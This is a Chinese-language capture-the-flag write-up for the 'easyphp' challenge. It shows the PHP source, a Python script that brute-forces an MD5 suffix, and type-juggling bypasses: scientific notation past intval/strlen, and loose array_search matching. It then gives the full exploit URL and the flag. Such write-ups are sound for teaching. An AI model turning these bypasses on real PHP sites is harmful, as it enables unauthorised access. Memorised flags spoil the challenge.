当前位置: 首页 > news >正文

[攻防世界] easyphp writeup

news 2025/6/8 6:41:51

知识点

  • 科学计数法的妙用
    • 9e9
  • 指定结尾MD5值的爆破
  • array_search() 函数用于在数组中搜索某个值,并返回对应的键名。如果找不到该值,则返回 false
    • 默认值匹配:可以利用整数绕过字符串匹配机制
    • strict=true时,数据类型和值都需要匹配,这时就不能绕过了
  • json格式:{"key":"value"}

解题思路

题目地址:http://223.112.5.141:62116

访问地址发现是一个代码审计;内容已加注解

 <?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;//通过GET方法获取输入的a、b的值
$a = $_GET['a'];
$b = $_GET['b'];//关于变量a的判断:a变量有值+转为整数后的值>6000000+字符串长度<3
if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){//关于b变量的判断:b变量存在+MD5编码后的后六位为8b184bif(isset($b) && '8b184b' === substr(md5($b),-6,6)){$key1 = 1;}else{die("Emmm...再想想");}}else{die("Emmm...");
}//将json格式的变量C转为数组
$c=(array)json_decode(@$_GET['c']);
//关于变量c的判断:c是数组+c['m']非整数+c['m']>2022+c['n']是数组且有两个元素+c['n'][0]也是数组+c['n']元素中有和"DGGJ"字符串值一样但是数据类型不一样的元素if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){$d = array_search("DGGJ", $c["n"]);$d === false?die("no..."):NULL;foreach($c["n"] as $key=>$val){$val==="DGGJ"?die("no......"):NULL;}$key2 = 1;}else{die("no hack");}
}else{die("no");
}//两个key值均为1的时候输出flag信息
//即需要a、b、c三个变量都满足对应条件
if($key1 && $key2){include "Hgfks.php";echo "You're right"."\n";echo $flag;
}?>
通过代码审计得到了a、b、c三个变量需要满足的条件
关于变量a的判断:a变量有值转为整数后的值>6000000字符串长度<3
乍看一下感觉很矛盾,但是这里容易忽略科学计数法
a=9e9 刚好能够满足需求
关于b变量的判断:b变量存在MD5编码后的后六位为8b184b
这里需要进行md5随机数爆破了,这里需要写一个爆破的脚本(放在下面了)
通过爆破得到了一个值:
549696021039
md5(549696021039)=836dba5c7b23351df27a754d778b184b这里的值不唯一,如果不限制爆破成功结束的话应该有很多
b=549696021039

#随机数md5爆破配对固定后六位脚本
import hashlib
import randomtarget = "8b184b"while True:#随机产生12位数字并转为字符串    number = str(random.randint(10**11, 10**12 - 1))#将字符串编码为字节串:输入格式需要;创建md5对象并转为16进制形式输出md5_hash = hashlib.md5(number.encode()).hexdigest()if md5_hash[-6:] == target:print(f"找到匹配的数字: {number}")print(f"对应的 MD5 哈希值: {md5_hash}")break


关于变量c的判断:json格式:键值对样式;如{"key":"value"}c转换完后是数组c['m']非整数c['m']>2022c['n']是数组且有两个元素c['n'][0]也是数组   c['n']元素中有和"DGGJ"字符串值一样但是数据类型不一样的元素array_search(mixed $needle, array $haystack, bool $strict = false): int|string|false
默认值匹配; strict=true时必须数据类型和值完全匹配
array_search函数默认情况下是值匹配的:即字符串和整数比较时都转为整数进行比较
那么"DGGJ"和0是相等的综上所述
尝试构造c变量:{"m":"2023a","n":[[1],0]}
有了上面的分析,尝试构造payload:
http://223.112.5.141:62116/?a=9e9&b=549696021039&c={"m":"2023a","n":[[1],0]}

访问后成功得到了flag: cyberpeace{cf294792e8e191e4e4899d6f0c34c3fd}

tips:复制flag的时候千万别多复制结尾空格,要不然答案是不对的

10

http://www.xdnf.cn/news/658117.html

相关文章:

  • Graph Neural Network(GNN)
  • 如何通过全流量溯源分析系统实现高效的网络质量监控
  • JavaSE核心知识点04工具04-02(IDEA)
  • 关于(stream)流
  • MySQL的基础操作
  • 内网搭建NTS服务器
  • 网络安全之Web渗透加解密
  • 原子操作(Atomic Operations)在SOC中的应用场景
  • 【R语言编程绘图-函数篇】
  • Sparse VideoGen开源:完全无损,视频生成速度加速两倍,支持Wan 2.1、HunyuanVideo等
  • DAY12打卡 启发式算法
  • 基于yjs实现协同编辑页面
  • 学习黑客Metasploit 框架的原理
  • 端午假期 · 粽享欢乐
  • 开源Vue表单设计器 FcDesigner 组件提供的方法详解
  • 《1.1_4计算机网络的分类|精讲篇|附X-mind思维导图》
  • deepseek告诉您http与https有何区别?
  • CQF预备知识:一、微积分 -- 1.4.6 莱布尼茨法则详解
  • Mysql在SQL层面的优化
  • [Java实战]SpringBoot集成SNMP实现OID数据获取:原理、实践与测试(三十三)
  • GitLab 从 17.10 到 18.0.1 的升级指南
  • 动态规划-918.环形子数组的最大和-力扣(LeetCode)
  • SQL Driver
  • 16QAM通信系统设计与实现(上篇)——信号生成与调制技术(python版本)
  • leetcode 525. 连续数组
  • CertiK联创顾荣辉做客纽交所,剖析Bybit与Coinbase事件暴露的Web3安全新挑战
  • 原子操作(C++)
  • 深度体验:海螺 AI,开启智能创作新时代
  • liunx、ubantu22.04安装neo4j数据库并设置开机自启
  • AI工程师跑路了-SpringAi来帮忙